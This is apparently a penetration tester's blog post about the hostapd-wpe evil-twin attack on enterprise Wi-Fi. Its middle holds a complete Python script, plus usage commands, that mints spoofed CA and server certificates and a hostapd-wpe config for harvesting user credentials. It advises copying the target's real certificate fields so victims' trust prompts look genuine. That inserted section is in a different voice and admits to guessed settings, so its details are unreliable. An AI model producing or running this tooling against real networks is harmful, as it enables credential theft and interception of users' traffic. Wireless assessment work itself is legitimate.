We’ve written in the past about the “Evil twin” or “Evil AP” attack using hostapd-wpe (“wireless pwnage edition”). This remains a viable attack in environments using enterprise authentication, and the patched hostapd obviates the need for a wireless access point, making the attack easy and portable.
However, like most attacks there are still opportunities for tweaking and optimization. In the case of the Evil AP attack against enterprise authentication, one of these areas is in the certificates presented by the attacker’s AP.
The hostapd-wpe repository includes the freeradius “bootstrap” certificate generation shell script, which can be used to quickly generate a CA and a server certificate for testing hostapd-wpe in enterprise authentication mode. The certificates generated by this script have the common name “Example Server Certificate,” and look like this when displayed on a connecting iOS device:
Unless you’re targeting the offices of Example, Inc. in Radius, France (I hear it’s nice this time of year), these aren’t particularly convincing (nor are they intended to be). Though we see some pretty generic self-signed certificates out there from time to time, I haven’t personally seen any labeled “example” yet.
To be clear, the parameters on the certificate only matter when users are able to choose which certificates to trust. Our own anecdotal evidence suggests that overall, administrators are getting better about not allowing users to authorize new servers or certification authorities (which is a long-standing recommendation).
Despite improvements, there is always the chance that this option will still be presented to users, or that you’ll find the one device (the fabled “CEO’s iPad”) that is able to connect to an enterprise network, but not subject to the same hardening guidelines as other devices. In cases such as those, it’s important to make the certificate presented by the evil AP as convincing as possible.
The parameters of the certificates generated by the bootstrap script are included in the CA.cnf and Server.cnf files:
Editing these is entirely possible, but tedious, and may require changing the directory in which the certificates are generated or the location that your hostapd-wpe configuration file points to.
This Python script, apd_launchpad, helps address that problem by providing a convenient way to create a hostapd-wpe configuration file and the associated spoofed certificates. It’s designed to be dropped in the directory where hostapd-wpe resides, and when executed creates a self-contained folder that can be removed after an assessment. It has been tested on Kali 2.0 rolling and Fedora. Thanks to @zerosteiner for code improvements and testing.
The script takes the parameters necessary for hosting a functional spoofed wireless network (SSID, channel, broadcast or hidden SSID, bridge interface if conducting a man-in-the-middle attack, etc.) as well as the parameters for faking a certificate (common name, organization, location, etc.). In the event that trusting a certificate is left up to the user, these options should allow you to quickly create one that, at a glance, resembles whatever is actually in use on the target network.
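To make concrete what a launcher like this has to produce, here is an added example of my own; it is not the apd_launchpad script and not code from hostapd-wpe or freeradius. It builds a self-contained bundle directory: `openssl req` configs for a spoofed CA and server certificate (every subject field set from the file, so nothing is prompted), the openssl commands that mint them, and a hostapd-wpe.conf pointing at the results. Assumptions: the hostapd-wpe.conf keys follow the sample config shipped with hostapd-wpe (`wpe_logfile` being the only non-stock-hostapd key used), the eap_user file contents are my recollection of the one hostapd-wpe ships, the certificates are minted with the plain `req`/`x509 -req` flow rather than the bootstrap script's `openssl ca` flow, and the SSID, organization and host names are made up.

```python
#!/usr/bin/env python3
"""hostapd-wpe bundle builder: openssl configs for a spoofed CA and server cert, the
commands that mint them, and a matching hostapd-wpe.conf.  Added example, not apd_launchpad."""
import shutil
import subprocess
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Optional

@dataclass
class Subject:
    """Subject fields the victim sees; defaults are the freeradius bootstrap values."""
    common_name: str = "Example Server Certificate"
    organization: str = "Example Inc."
    locality: str = "Somewhere"
    state: str = "Radius"
    country: str = "FR"
    email: str = "admin@example.org"

@dataclass
class AccessPoint:
    ssid: str
    interface: str = "wlan0"
    channel: int = 1
    hidden: bool = False
    bridge: Optional[str] = None  # bridge interface when running a MitM setup

def openssl_cnf(subj: Subject, ca: bool, password: str) -> str:
    """openssl req config; prompt=no lets every subject field come from the file."""
    ext = ("basicConstraints = critical,CA:TRUE\nkeyUsage = keyCertSign, cRLSign" if ca
           else "basicConstraints = CA:FALSE\nextendedKeyUsage = serverAuth")
    dn = {"countryName": subj.country, "stateOrProvinceName": subj.state,
          "localityName": subj.locality, "organizationName": subj.organization,
          "emailAddress": subj.email, "commonName": subj.common_name}
    return ("[ req ]\nprompt = no\ndefault_bits = 2048\ndistinguished_name = subject\n"
            f"x509_extensions = v3_ext\ninput_password = {password}\noutput_password = {password}\n"
            "\n[ subject ]\n" + "".join(f"{k} = {v}\n" for k, v in dn.items())
            + f"\n[ v3_ext ]\n{ext}\n")

def hostapd_wpe_conf(ap: AccessPoint, certdir, password: str) -> str:
    """hostapd-wpe.conf in the layout of the sample shipped with hostapd-wpe (assumed);
    wpe_logfile is hostapd-wpe's own key, the rest is stock hostapd.  Absolute paths."""
    c = Path(certdir)
    lines = [
        f"interface={ap.interface}", "driver=nl80211", f"ssid={ap.ssid}",
        f"hw_mode={'a' if ap.channel > 14 else 'g'}",  # 5 GHz channels need hw_mode=a
        f"channel={ap.channel}", f"ignore_broadcast_ssid={1 if ap.hidden else 0}",
        "ieee8021x=1", "eap_server=1", "eapol_key_index_workaround=0",
        f"eap_user_file={c.parent / 'hostapd-wpe.eap_user'}",
        f"ca_cert={c / 'ca.pem'}", f"server_cert={c / 'server.pem'}",
        f"private_key={c / 'server.pem'}",  # cert + encrypted key concatenated
        f"private_key_passwd={password}", f"dh_file={c / 'dh'}",
        "wpa=2", "wpa_key_mgmt=WPA-EAP", "wpa_pairwise=TKIP CCMP", "rsn_pairwise=CCMP",
        f"wpe_logfile={c.parent / 'hostapd-wpe.log'}",
    ]
    if ap.bridge:
        lines.insert(1, f"bridge={ap.bridge}")
    return "\n".join(lines) + "\n"

def openssl_commands(certdir, password: str) -> List[List[str]]:
    """Self-signed CA, CA-signed server cert, DH params (-dsaparam keeps it quick)."""
    c = Path(certdir)
    return [
        ["openssl", "req", "-new", "-x509", "-days", "365", "-config", str(c / "ca.cnf"),
         "-keyout", str(c / "ca.key"), "-out", str(c / "ca.pem")],
        ["openssl", "req", "-new", "-config", str(c / "server.cnf"),
         "-keyout", str(c / "server.key"), "-out", str(c / "server.csr")],
        ["openssl", "x509", "-req", "-days", "365", "-in", str(c / "server.csr"),
         "-CA", str(c / "ca.pem"), "-CAkey", str(c / "ca.key"), "-CAcreateserial",
         "-passin", f"pass:{password}", "-extfile", str(c / "server.cnf"),
         "-extensions", "v3_ext", "-out", str(c / "server.crt")],
        ["openssl", "dhparam", "-dsaparam", "-out", str(c / "dh"), "2048"],
    ]

def build_bundle(outdir, ap: AccessPoint, ca: Subject, server: Subject, password: str) -> Dict[str, str]:
    """Every text file of the bundle as {relative path: contents}; writes nothing."""
    out = Path(outdir)
    return {
        "certs/ca.cnf": openssl_cnf(ca, True, password),
        "certs/server.cnf": openssl_cnf(server, False, password),
        "hostapd-wpe.conf": hostapd_wpe_conf(ap, out / "certs", password),
        # phase-1/phase-2 EAP user entries, assumed from the eap_user file hostapd-wpe ships
        "hostapd-wpe.eap_user": ('*\tPEAP,TTLS,TLS,FAST\n"t"\tTTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,'
                                 'MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2\t"pass"\t[2]\n'),
    }

def write_bundle(outdir, ap: AccessPoint, ca: Subject, server: Subject, password: str) -> Path:
    """Write the bundle and mint the certs if openssl is on PATH; rm -rf outdir undoes it all."""
    out, certs = Path(outdir), Path(outdir) / "certs"
    for rel, text in build_bundle(out, ap, ca, server, password).items():
        (out / rel).parent.mkdir(parents=True, exist_ok=True)
        (out / rel).write_text(text)
    if shutil.which("openssl"):
        for cmd in openssl_commands(certs, password):
            subprocess.run(cmd, check=True, capture_output=True)
        # hostapd-wpe points server_cert and private_key at one file: cert then key
        (certs / "server.pem").write_text((certs / "server.crt").read_text() + (certs / "server.key").read_text())
    return out / "hostapd-wpe.conf"
```

Usage, with made-up names: `write_bundle("./corp-wifi-bundle", AccessPoint(ssid="CorpWiFi", channel=6), Subject(common_name="Corp Root CA", organization="Corp Inc.", locality="Chicago", state="IL", country="US"), Subject(common_name="radius01.corp.example", organization="Corp Inc.", locality="Chicago", state="IL", country="US"), "whatever")`, then `sudo ./hostapd-wpe corp-wifi-bundle/hostapd-wpe.conf`. Before going live, run `openssl x509 -in corp-wifi-bundle/certs/server.pem -noout -subject -issuer -dates` and compare it against what you have seen on the target's real RADIUS certificate, since those fields and the issuer name are exactly what the victim's trust prompt displays; the private key is encrypted with the same passphrase that `private_key_passwd` carries, so keep the two in sync if you change either.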
Hopefully the tool provides additional flexibility to the hostapd-wpe attack, and allows you to quickly craft configurations suited to your target environment. Happy hunting.
digby sends.